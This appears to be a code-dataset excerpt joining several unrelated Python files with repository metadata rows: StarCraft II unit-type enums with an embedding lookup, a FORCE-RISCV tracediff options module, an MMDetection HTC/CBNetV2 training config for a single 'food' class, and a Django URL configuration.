    Carrier = 79
    Colossus = 4
    CyberneticsCore = 72
    DarkShrine = 69
    DarkTemplar = 76
    Disruptor = 694
    DisruptorPhased = 733
    FleetBeacon = 64
    ForceField = 135
    Forge = 63
    Gateway = 62
    HighTemplar = 75
    Immortal = 83
    Interceptor = 85
    Mothership = 10
    MothershipCore = 488
    Nexus = 59
    Observer = 82
    ObserverSiegeMode = 1911
    Oracle = 495
    OracleStasisTrap = 732
    Phoenix = 78
    PhotonCannon = 66
    Probe = 84
    Pylon = 60
    PylonOvercharged = 894
    RoboticsBay = 70
    RoboticsFacility = 71
    Sentry = 77
    ShieldBattery = 1910
    Stalker = 74
    Stargate = 67
    Tempest = 496
    TemplarArchive = 68
    TwilightCouncil = 65
    VoidRay = 80
    WarpGate = 133
    WarpPrism = 81
    WarpPrismPhasing = 136
    Zealot = 73
class Terran(enum.IntEnum):
    """Terran unit and structure type IDs.

    Member values are the raw integer unit-type identifiers reported by the
    game observation.  Definition order matters: get_unit_embed_lookup
    assigns dense embedding indices by iterating the enum in this order,
    so do not reorder or remove members.
    """
    Armory = 29
    AutoTurret = 31
    Banshee = 55
    Barracks = 21
    BarracksFlying = 46
    BarracksReactor = 38
    BarracksTechLab = 37
    Battlecruiser = 57
    Bunker = 24
    CommandCenter = 18
    CommandCenterFlying = 36
    Cyclone = 692
    EngineeringBay = 22
    Factory = 27
    FactoryFlying = 43
    FactoryReactor = 40
    FactoryTechLab = 39
    FusionCore = 30
    Ghost = 50
    GhostAcademy = 26
    GhostAlternate = 144
    GhostNova = 145
    Hellion = 53
    HellionTank = 484
    KD8Charge = 830
    Liberator = 689
    LiberatorAG = 734
    MULE = 268
    Marauder = 51
    Marine = 48
    Medivac = 54
    MissileTurret = 23
    Nuke = 58
    OrbitalCommand = 132
    OrbitalCommandFlying = 134
    PlanetaryFortress = 130
    PointDefenseDrone = 11
    Raven = 56
    RavenRepairDrone = 1913
    Reactor = 6
    Reaper = 49
    Refinery = 20
    RefineryRich = 1943
    SCV = 45
    SensorTower = 25
    SiegeTank = 33
    SiegeTankSieged = 32
    Starport = 28
    StarportFlying = 44
    StarportReactor = 42
    StarportTechLab = 41
    SupplyDepot = 19
    SupplyDepotLowered = 47
    TechLab = 5
    Thor = 52
    ThorAP = 691
    VikingAssault = 34
    VikingFighter = 35
    WidowMine = 498
    WidowMineBurrowed = 500
class Zerg(enum.IntEnum):
    """Zerg unit and structure type IDs.

    Member values are the raw integer unit-type identifiers reported by the
    game observation.  Definition order matters: get_unit_embed_lookup
    assigns dense embedding indices by iterating the enum in this order,
    so do not reorder or remove members.
    """
    Baneling = 9
    BanelingBurrowed = 115
    BanelingCocoon = 8
    BanelingNest = 96
    BroodLord = 114
    BroodLordCocoon = 113
    Broodling = 289
    BroodlingEscort = 143
    Changeling = 12
    ChangelingMarine = 15
    ChangelingMarineShield = 14
    ChangelingZealot = 13
    ChangelingZergling = 17
    ChangelingZerglingWings = 16
    Corruptor = 112
    CreepTumor = 87
    CreepTumorBurrowed = 137
    CreepTumorQueen = 138
    Drone = 104
    DroneBurrowed = 116
    Egg = 103
    EvolutionChamber = 90
    Extractor = 88
    ExtractorRich = 1995
    GreaterSpire = 102
    Hatchery = 86
    Hive = 101
    Hydralisk = 107
    HydraliskBurrowed = 117
    HydraliskDen = 91
    InfestationPit = 94
    InfestedTerransEgg = 150
    Infestor = 111
    InfestorBurrowed = 127
    InfestorTerran = 7
    InfestorTerranBurrowed = 120
    Lair = 100
    Larva = 151
    LocustMP = 489
    LocustMPFlying = 693
    LurkerDenMP = 504
    LurkerMP = 502
    LurkerMPBurrowed = 503
    LurkerMPEgg = 501
    Mutalisk = 108
    NydusCanal = 142
    NydusNetwork = 95
    Overlord = 106
    OverlordCocoon = 128
    OverlordTransport = 893
    Overseer = 129
    OverseerSiegeMode = 1912
    ParasiticBombDummy = 824
    Queen = 126
    QueenBurrowed = 125
    Ravager = 688
    RavagerBurrowed = 690
    RavagerCocoon = 687
    Roach = 110
    RoachBurrowed = 118
    RoachWarren = 97
    SpawningPool = 89
    SpineCrawler = 98
    SpineCrawlerUprooted = 139
    Spire = 92
    SporeCrawler = 99
    SporeCrawlerUprooted = 140
    SwarmHostBurrowedMP = 493
    SwarmHostMP = 494
    TransportOverlordCocoon = 892
    Ultralisk = 109
    UltraliskBurrowed = 131
    UltraliskCavern = 93
    Viper = 499
    Zergling = 105
    ZerglingBurrowed = 119
def get_unit_type(unit_id):
    """Resolve a raw integer unit id to its race-specific enum member.

    Tries each race enum in turn and returns the first member whose value
    matches.

    Args:
        unit_id: integer unit-type identifier from a game observation.

    Returns:
        The matching Neutral/Protoss/Terran/Zerg member, or None when the id
        is not defined in any of the four enums.  (Previously the unknown-id
        case fell off the end of the function and returned None implicitly;
        the behavior is unchanged, just made explicit.)
    """
    for race in (Neutral, Protoss, Terran, Zerg):
        try:
            return race(unit_id)
        except ValueError:
            pass  # unit_id does not belong to this race; try the next one.
    return None  # Unknown unit id.
# Convert the sparse unit ids into a dense index space so that we don't waste
# a heap of memory creating embeddings for unit ids that don't exist.
def get_unit_embed_lookup():
    """Build a dict mapping raw unit-type ids to dense embedding indices.

    Neutral units are collapsed into a small set of shared categories
    (index 0-8: none/minerals/geysers/destructibles/...), since their exact
    identity carries little information.  Every Protoss, Terran and Zerg unit
    then receives its own index, assigned sequentially in enum definition
    order starting at 9.

    Returns:
        dict mapping int unit id -> int embedding index.  Index 0 is reserved
        for "no unit" so padded entries have something to embed.
    """
    lookup = {}
    # Shared embedding indices for the neutral categories.
    none = 0
    mineral_field = 1
    rich_mineral_field = 2
    vespene_field = 3
    rich_vespene_field = 4
    destructible = 5
    collapsible = 6
    unbuildable = 7
    xelnagatower = 8
    # Reserve id 0 as 'no unit' for padded values in the embedding layer.
    lookup[0] = none
    embed_index = 9
    # Classify neutral units by name.  Check order matters: e.g.
    # 'UnbuildableRocksDestructible' must hit the 'Unbuildable' branch first.
    # (Iterate the enum members directly instead of the old
    # list(map(int, Neutral)) / Neutral(unit_id) int<->enum round-trip.)
    for member in Neutral:
        attr = member.name
        if 'Mineral' in attr:
            lookup[member.value] = rich_mineral_field if 'Rich' in attr else mineral_field
        elif 'Geyser' in attr:
            lookup[member.value] = rich_vespene_field if 'Rich' in attr else vespene_field
        elif 'Unbuildable' in attr:
            lookup[member.value] = unbuildable
        elif 'Destructible' in attr or 'Debris' in attr:
            lookup[member.value] = destructible
        elif 'Collapsible' in attr:
            lookup[member.value] = collapsible
        elif 'XelNagaTower' in attr:
            lookup[member.value] = xelnagatower
        else:
            lookup[member.value] = none
    # Every non-neutral unit gets its own dense index, in definition order.
    for race in (Protoss, Terran, Zerg):
        for member in race:
            lookup[member.value] = embed_index
            embed_index += 1
    return lookup
| 26.431319 | 101 | 0.677788 |
acdfcac9afc59ddedae895c33637961b533590f7 | 1,549 | py | Python | utils/regression/applications/tracediff_riscv/TracediffRiscVInit.py | Wlgen/force-riscv | 9f09b86c5a21ca00f8e5ade8e5186d65bc3e26f8 | [
"Apache-2.0"
] | null | null | null | utils/regression/applications/tracediff_riscv/TracediffRiscVInit.py | Wlgen/force-riscv | 9f09b86c5a21ca00f8e5ade8e5186d65bc3e26f8 | [
"Apache-2.0"
] | null | null | null | utils/regression/applications/tracediff_riscv/TracediffRiscVInit.py | Wlgen/force-riscv | 9f09b86c5a21ca00f8e5ade8e5186d65bc3e26f8 | [
"Apache-2.0"
] | null | null | null | #
# Copyright (C) [2020] Futurewei Technologies, Inc.
#
# FORCE-RISCV is licensed under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# THIS SOFTWARE IS PROVIDED ON AN "AS IS" BASIS, WITHOUT WARRANTIES
# OF ANY KIND, EITHER EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO
# NON-INFRINGEMENT, MERCHANTABILITY OR FIT FOR A PARTICULAR PURPOSE.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from classes.ApplicationOption import ParameterProcessor
# Define additional TRACECMP specific command line parameters
#
class TracediffRiscVCmdLineOptions(object):
    """Command-line option declarations for the tracediff RISC-V application.

    Consumed by the regression framework's option machinery; the class only
    carries data, it is never instantiated with state of its own.
    """

    # Display name and description for this option group in --help output.
    cGroupName = "Trace diff RiscV related options"
    cGroupDescription = "Useful TRACEDIFF options to control TRACEDIFF usage"

    # Each entry would declare one option as:
    # "option name" | "additional arguments" | "default value"
    # | "number of value arguments" | "help text"
    # No tracediff-specific options are defined yet.
    cOptions = []
# Used to process application specific parameters
#
class TracediffRiscVParametersProcessor(ParameterProcessor):
    """Processes application-specific parameters for the tracediff app.

    Thin wrapper: delegates all work to the generic ParameterProcessor,
    supplying the (currently empty) tracediff option list.
    """

    def __init__(self, aCmdLineOptions):
        # aCmdLineOptions: parsed command-line options handed in by the
        # regression framework; forwarded unchanged to the base class.
        super().__init__(TracediffRiscVCmdLineOptions.cOptions, aCmdLineOptions)
# Process tracecmp control data
#
def process_tracediff_riscv_control_data(aControlData, aAppParameters):
    """Transfer tracediff-specific application parameters into control data.

    Currently a placeholder: no tracediff parameters are defined, so the
    function performs no work regardless of its arguments.

    Args:
        aControlData: mutable control-data mapping for the test run.
        aAppParameters: application parameter container, possibly None.

    Returns:
        None in all cases.
    """
    if aAppParameters is None:
        # No application parameters were produced; nothing to transfer.
        return None
    # Placeholder: no tracediff-specific control data is processed yet.
    return None
| 35.204545 | 80 | 0.706908 |
acdfcbcb9f2522edfd38a79fe8c282b3154ea05c | 7,966 | py | Python | configs/custom/htc_cbv2_swin_base_patch4_window7_mstrain_400-1400_giou_4conv1f_adamw_20e_coco.py | onestep00/CBNetV2 | 2655034a92caf134486c527383eae0f792beead4 | [
"Apache-2.0"
] | null | null | null | configs/custom/htc_cbv2_swin_base_patch4_window7_mstrain_400-1400_giou_4conv1f_adamw_20e_coco.py | onestep00/CBNetV2 | 2655034a92caf134486c527383eae0f792beead4 | [
"Apache-2.0"
] | null | null | null | configs/custom/htc_cbv2_swin_base_patch4_window7_mstrain_400-1400_giou_4conv1f_adamw_20e_coco.py | onestep00/CBNetV2 | 2655034a92caf134486c527383eae0f792beead4 | [
"Apache-2.0"
] | 1 | 2021-08-19T01:03:24.000Z | 2021-08-19T01:03:24.000Z | _base_ = [
"../_base_/models/htc_without_semantic_swin_fpn.py",
# "../_base_/datasets/coco_instance.py",
"../_base_/datasets/coco_detection.py",
"../_base_/schedules/schedule_1x.py",
"../_base_/default_runtime.py",
]
# HTC detector with a CBNetV2 (composite) Swin-Base backbone, configured for
# detection only: the mask branch is disabled (mask_roi_extractor/mask_head
# set to None) and a single foreground class is used.
model = dict(
    backbone=dict(
        type="CBSwinTransformer",
        embed_dim=128,               # Swin-Base channel width
        depths=[2, 2, 18, 2],
        num_heads=[4, 8, 16, 32],
        window_size=7,
        ape=False,                   # no absolute position embedding
        drop_path_rate=0.3,
        patch_norm=True,
        use_checkpoint=False,        # gradient checkpointing off
    ),
    neck=dict(type="CBFPN", in_channels=[128, 256, 512, 1024]),
    roi_head=dict(
        # Three cascade stages with progressively tighter box-regression stds.
        bbox_head=[
            dict(
                type="ConvFCBBoxHead",
                num_shared_convs=4,
                num_shared_fcs=1,
                in_channels=256,
                conv_out_channels=256,
                fc_out_channels=1024,
                roi_feat_size=7,
                # class food
                num_classes=1,
                bbox_coder=dict(
                    type="DeltaXYWHBBoxCoder",
                    target_means=[0.0, 0.0, 0.0, 0.0],
                    target_stds=[0.1, 0.1, 0.2, 0.2],
                ),
                reg_class_agnostic=True,
                reg_decoded_bbox=True,
                # single gpu: plain BN instead of SyncBN
                norm_cfg=dict(type="BN", requires_grad=True),
                loss_cls=dict(
                    type="CrossEntropyLoss", use_sigmoid=False, loss_weight=1.0
                ),
                loss_bbox=dict(type="GIoULoss", loss_weight=10.0),
            ),
            dict(
                type="ConvFCBBoxHead",
                num_shared_convs=4,
                num_shared_fcs=1,
                in_channels=256,
                conv_out_channels=256,
                fc_out_channels=1024,
                roi_feat_size=7,
                # class food
                num_classes=1,
                bbox_coder=dict(
                    type="DeltaXYWHBBoxCoder",
                    target_means=[0.0, 0.0, 0.0, 0.0],
                    target_stds=[0.05, 0.05, 0.1, 0.1],
                ),
                reg_class_agnostic=True,
                reg_decoded_bbox=True,
                # single gpu: plain BN instead of SyncBN
                norm_cfg=dict(type="BN", requires_grad=True),
                loss_cls=dict(
                    type="CrossEntropyLoss", use_sigmoid=False, loss_weight=1.0
                ),
                loss_bbox=dict(type="GIoULoss", loss_weight=10.0),
            ),
            dict(
                type="ConvFCBBoxHead",
                num_shared_convs=4,
                num_shared_fcs=1,
                in_channels=256,
                conv_out_channels=256,
                fc_out_channels=1024,
                roi_feat_size=7,
                # class food
                num_classes=1,
                bbox_coder=dict(
                    type="DeltaXYWHBBoxCoder",
                    target_means=[0.0, 0.0, 0.0, 0.0],
                    target_stds=[0.033, 0.033, 0.067, 0.067],
                ),
                reg_class_agnostic=True,
                reg_decoded_bbox=True,
                # single gpu: plain BN instead of SyncBN
                norm_cfg=dict(type="BN", requires_grad=True),
                loss_cls=dict(
                    type="CrossEntropyLoss", use_sigmoid=False, loss_weight=1.0
                ),
                loss_bbox=dict(type="GIoULoss", loss_weight=10.0),
            ),
        ],
        # Instance-segmentation heads kept for reference but disabled below.
        # mask_head=[
        #     dict(
        #         type="HTCMaskHead",
        #         num_classes=2,
        #     ),
        #     dict(
        #         type="HTCMaskHead",
        #         num_classes=2,
        #     ),
        #     dict(
        #         type="HTCMaskHead",
        #         num_classes=2,
        #     ),
        # ],
        mask_roi_extractor=None,
        mask_head=None,
    ),
    test_cfg=dict(
        rcnn=dict(
            # Low score threshold + soft-NMS to keep more candidate boxes.
            score_thr=0.001,
            nms=dict(type="soft_nms"),
        )
    ),
)
# ImageNet mean/std normalization (RGB order).
img_norm_cfg = dict(
    mean=[123.675, 116.28, 103.53], std=[58.395, 57.12, 57.375], to_rgb=True
)
# augmentation strategy originates from HTC
train_pipeline = [
    dict(type="LoadImageFromFile"),
    # Boxes only: masks and semantic segs are not loaded (detection-only run).
    dict(type="LoadAnnotations", with_bbox=True, with_mask=False, with_seg=False),
    dict(
        type="Resize",
        # Multi-scale training: long side 1600, short side sampled in [400, 1400].
        img_scale=[(1600, 400), (1600, 1400)],
        multiscale_mode="range",
        keep_ratio=True,
    ),
    dict(type="RandomFlip", flip_ratio=0.5),
    dict(type="Normalize", **img_norm_cfg),
    dict(type="Pad", size_divisor=32),
    # NOTE(review): SegRescale is retained from the original HTC pipeline even
    # though with_seg=False above — presumably a harmless no-op here; verify.
    dict(type="SegRescale", scale_factor=1 / 8),
    dict(type="DefaultFormatBundle"),
    dict(
        type="Collect",
        # keys=["img", "gt_bboxes", "gt_labels", "gt_masks", "gt_semantic_seg"],
        keys=[
            "img",
            "gt_bboxes",
            "gt_labels",
        ],
    ),
]
# Inference pipeline: single fixed scale, no flip augmentation.
test_pipeline = [
    dict(type="LoadImageFromFile"),
    dict(
        type="MultiScaleFlipAug",
        img_scale=(1600, 1400),
        flip=False,
        transforms=[
            dict(type="Resize", keep_ratio=True),
            dict(type="RandomFlip"),
            dict(type="Normalize", **img_norm_cfg),
            dict(type="Pad", size_divisor=32),
            dict(type="ImageToTensor", keys=["img"]),
            dict(type="Collect", keys=["img"]),
        ],
    ),
]
# Dataset locations (COCO-format annotations on a JupyterHub-style mount).
dataset_type = "CocoDataset"
# Single class; the Korean label "음식" means "food".  The string must match
# the category name in the annotation JSON, so it is kept verbatim.
classes = ("음식",)
data_root = "/home/jovyan/data/filtered-food2"
anno_root = "/home/jovyan/workspace/ml_mg/json_data/"
samples_per_gpu = 1
# Train/val/test splits share the same image root; only annotation files and
# pipelines differ.
data = dict(
    workers_per_gpu=16,
    samples_per_gpu=samples_per_gpu,
    train=dict(
        type=dataset_type,
        img_prefix=data_root,
        classes=classes,
        ann_file=anno_root + "train_new_split.json",
        # ann_file=anno_root + "datatest.json",
        pipeline=train_pipeline,
    ),
    val=dict(
        type=dataset_type,
        img_prefix=data_root,
        classes=classes,
        ann_file=anno_root + "val_new_split.json",
        pipeline=test_pipeline,
    ),
    test=dict(
        type=dataset_type,
        img_prefix=data_root,
        classes=classes,
        ann_file=anno_root + "test_new.json",
        pipeline=test_pipeline,
    ),
)
# AdamW with the base LR scaled by batch size (reference LR 1e-4 at
# samples_per_gpu=2).  _delete_=True discards the optimizer inherited from
# the base schedule config.
optimizer = dict(
    _delete_=True,
    type="AdamW",
    lr=0.0001 * (samples_per_gpu / 2),
    betas=(0.9, 0.999),
    weight_decay=0.05,
    paramwise_cfg=dict(
        # Standard Swin practice: no weight decay on position tables or norms.
        custom_keys={
            "absolute_pos_embed": dict(decay_mult=0.0),
            "relative_position_bias_table": dict(decay_mult=0.0),
            "norm": dict(decay_mult=0.0),
        }
    ),
)
# LR steps at epochs 16 and 19 of a 20-epoch run.
lr_config = dict(step=[16, 19])
runner = dict(type="EpochBasedRunnerAmp", max_epochs=20)
# do not use mmdet version fp16 — mixed precision is handled by the
# DistOptimizerHook (apex-style AMP) below instead.
fp16 = None
optimizer_config = dict(
    type="DistOptimizerHook",
    update_interval=1,
    grad_clip=None,
    coalesce=True,
    bucket_size_mb=-1,
    use_fp16=True,
)
# Log every iteration to the text logger and to Weights & Biases.
log_config = dict(
    interval=1,
    hooks=[
        dict(type="TextLoggerHook", reset_flag=True),
        dict(
            type="WandbLoggerHook",
            init_kwargs=dict(
                project="mmdetection",
                name="htc_cbv2_swin_base22k_patch4_window7_mstrain_400-1400_giou_4conv1f_adamw_20e_coco",
            ),
        ),
    ],
)
evaluation = dict(  # The config to build the evaluation hook, refer to https://github.com/open-mmlab/mmdetection/blob/master/mmdet/core/evaluation/eval_hooks.py#L7 for more details.
    interval=1, metric=["bbox"]  # Evaluate bbox mAP every epoch.
)
# Alternate one training epoch with one validation epoch.
workflow = [("train", 1), ("val", 1)]
# workflow = [("val", 1)]
# Continue an interrupted run from the latest checkpoint; switch to the
# commented load_from lines below to fine-tune from a checkpoint instead.
resume_from = "/home/jovyan/workspace/ml_mg/cbnetev2/work_dirs/htc_cbv2_swin_base_patch4_window7_mstrain_400-1400_giou_4conv1f_adamw_20e_coco/latest.pth"
# load_from = "/home/jovyan/workspace/ml_mg/cbnetev2/work_dirs/htc_cbv2_swin_base_patch4_window7_mstrain_400-1400_giou_4conv1f_adamw_20e_coco/latest.pth"
# pretrained
# load_from = "/home/jovyan/workspace/ml_mg/cbnetev2/checkpoints/htc_cbv2_swin_base22k_patch4_window7_mstrain_400-1400_giou_4conv1f_adamw_20e_coco.pth"
| 30.875969 | 182 | 0.543184 |
acdfcd9cd7bc78200287521697da8b3efd08056a | 768 | py | Python | nz_django/day1/template_for_demo/template_for_demo/urls.py | gaohj/nzflask_bbs | 36a94c380b78241ed5d1e07edab9618c3e8d477b | [
"Apache-2.0"
] | null | null | null | nz_django/day1/template_for_demo/template_for_demo/urls.py | gaohj/nzflask_bbs | 36a94c380b78241ed5d1e07edab9618c3e8d477b | [
"Apache-2.0"
] | 27 | 2020-02-12T07:55:58.000Z | 2022-03-12T00:19:09.000Z | nz_django/day1/template_for_demo/template_for_demo/urls.py | gaohj/nzflask_bbs | 36a94c380b78241ed5d1e07edab9618c3e8d477b | [
"Apache-2.0"
] | 2 | 2020-02-18T01:54:55.000Z | 2020-02-21T11:36:28.000Z | """template_for_demo URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/2.0/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, path
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
from django.contrib import admin
from django.urls import path
from . import views
# URL routes for the project: the site root is served by the app's index view.
urlpatterns = [
    path('', views.index),
]
| 34.909091 | 77 | 0.713542 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.